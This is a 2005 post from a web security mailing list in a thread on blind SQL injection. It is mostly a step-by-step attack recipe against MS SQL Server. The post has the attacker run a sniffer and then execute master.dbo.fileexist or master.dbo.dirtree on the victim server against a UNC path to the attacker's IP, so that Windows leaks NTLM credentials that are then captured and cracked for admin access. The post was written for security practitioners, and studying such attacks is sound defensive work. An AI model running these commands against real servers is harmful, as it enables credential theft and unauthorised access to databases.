[WEB SECURITY] RE: Blind SQL Injection / Stored procedures
Argeniss
lists at argeniss.com
Thu Nov 17 13:23:01 EST 2005
I would like to mention a trick for MS SQL Server (this is a Windows
weaknesses so it can be exploited on other applications as well) that is not
well known and it could be really dangerous, it has some limitations, ie: if
SQL Server is behind a firewall blocking connection, etc.
-By default Windows sends NTLM credentials when authenticating to network
shares.
-Run Cain tool on your computer
-Start sniffer.
-On victim server
EXECUTE master.dbo.fileexist '\\yourIP\anything'
or
EXECUTE master.dbo.dirtree '\\yourIP\anything'
-Check on Cain SMB captured passwords
-Send it to cracker.
-Crack it.
If SQL Server is not running under system account and if the password is
weak then it can be cracked and then get admin access to SQL Server.
Enjoy.
Cesar.
---------------------------------------------------------------------
The Web Security Mailing List
http://www.webappsec.org/lists/websecurity/
The Web Security Mailing List Archives
http://www.webappsec.org/lists/websecurity/archive/
More information about the websecurity
mailing list